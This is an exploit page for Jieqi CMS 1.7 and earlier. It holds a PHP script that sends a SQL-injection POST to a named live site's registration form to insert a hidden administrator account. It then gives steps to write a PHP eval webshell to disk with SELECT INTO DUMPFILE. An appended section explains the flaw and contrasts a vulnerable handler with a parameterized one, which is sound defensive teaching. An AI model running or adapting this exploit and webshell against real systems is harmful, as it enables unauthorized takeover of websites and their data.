Running this script inserts a new administrator directly into the target site's database:
username = b1u3b0y
password = lanhai
This code is for experimental use only; do not use it for illegal purposes.
Note: the official Jieqi 1.7 release has already fixed this vulnerability.
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
$argv = array("","www.slzww.com","80","http://www.slzww.com/");
function http_send($host, $packet, $port){
$sock = fsockopen($host, $port);
while (!$sock){
print "\n[-] No response from {$host}:$port Trying again...";
$sock = fsockopen($host, $port);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
print_r('
+---------------------------------------------------------------------------+
| Jieqi CMS Add Manager [version <=1.7] |
+---------------------------------------------------------------------------+
+---------------------------------------------------------------------------+
');
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$payload = "username=woainimeimei&password=imnothack&repassword=imnothack&email=woainimeimei@163.COM&sex=9,'woainimeimei@163.COM','',0,0,'','','','','','','','',1332592733,0,0,0,1,0,0,0,0,10,10,0,0,0,0,0,0,0,0),(0, 0, 'niaiwome', 'niaiwome', '2eb429c676681a7bf5ae8702aa768363', 2, 1332592733, 'H', 9, 'justjsp@163.com', '', 0, 0, '', '', '', '', '', '', '', '', 1332592733, 0, 0, 0, 1, 0, 0, 0, 0, 10, 10, 0, 0, 0,0, 0, 0, 0, 0)#&qq=&url=&action=newuser&submit=%CC%E1+%BD%BB\r\n";
$packet = "POST {$path}register.php?do=submit HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Cookie: jieqiVisitInfo=jieqiUserLogin%3D1332488363%2CjieqiUserId%3D1; PHPSESSID=ho4u03ebnlq6cl6vlg1t2kbjg2";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet, $port);
print_r('
+---------------------------------------------------------------------------+
[+] Add manager successful? Please check it yourself!
[ ] Default URL: http://localhost/admin
[ ] username = b1u3b0y
[ ] password = lanhai
+---------------------------------------------------------------------------+
[+] Get Webshell (mysql用户需要file_priv权限)
[ ] [系统工具] -> [系统信息] (Get Path)
[ ] [数据维护] -> [数据库升级]
[ ] 执行 [ select concat(char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)) into dumpfile \'C:\\\\wwwroot\\\\1.php\' ]
[ ] http://localhost/1.php (password:cmd)
+---------------------------------------------------------------------------+
');
?>
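The payload above works because the `sex` field is the last value in an INSERT and is interpolated unescaped, so `9,'...'),(0, 0, 'niaiwome', ...)#` closes the legitimate row, appends an admin row and comments out the rest of the statement. The following is an added example, not Jieqi's code: a hypothetical register handler with that pattern beside a hardened one, run against an in-memory SQLite table whose schema (and `groupid = 1` meaning admin) is an assumption made for the demonstration.

```php
<?php
// Added example, not part of the original page or of Jieqi CMS.
// Hypothetical, simplified user table; groupid 1 = admin is an assumption.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT,
           password TEXT, groupid INTEGER, sex INTEGER)");

// Vulnerable pattern: request fields are interpolated into the INSERT.
// Because 'sex' is the final value, a crafted value can close the row and
// append a second one, which is exactly what the exploit's payload does.
function register_vulnerable(PDO $db, array $post): void {
    $sql = "INSERT INTO users (username, password, groupid, sex) VALUES ('"
         . $post['username'] . "', '" . md5($post['password']) . "', 2, "
         . $post['sex'] . ")";
    $db->exec($sql);
}

// Hardened: validate the integer, restrict the username charset, bind every
// value and never let the request decide the group.
function register_safe(PDO $db, array $post): void {
    $sex = filter_var($post['sex'], FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 0, 'max_range' => 2]]);
    if ($sex === false) {
        throw new InvalidArgumentException('invalid sex');
    }
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $post['username'])) {
        throw new InvalidArgumentException('invalid username');
    }
    $stmt = $db->prepare("INSERT INTO users (username, password, groupid, sex)
                          VALUES (?, ?, 2, ?)");
    $stmt->execute([$post['username'],
                    password_hash($post['password'], PASSWORD_DEFAULT), $sex]);
}

// Constructed request: a normal-looking user plus a smuggled admin row.
// SQLite uses '--' rather than '#' for comments, so the constructed value
// uses '--' to show the same technique the page's '#' relies on in MySQL.
$crafted = ['username' => 'alice', 'password' => 'pw',
            'sex' => "1),('smuggled','x',1,0)--"];

register_vulnerable($db, $crafted);
$admins = $db->query("SELECT COUNT(*) FROM users WHERE groupid = 1")->fetchColumn();
echo "vulnerable handler: {$admins} admin row(s) created\n";

try {
    register_safe($db, $crafted);
    echo "safe handler: inserted\n";
} catch (InvalidArgumentException $e) {
    echo "safe handler: rejected ({$e->getMessage()})\n";
}
```

Auditing for this class of bug means looking for any SQL built by string concatenation from request data; the fix is parameter binding plus server-side validation, not escaping individual fields.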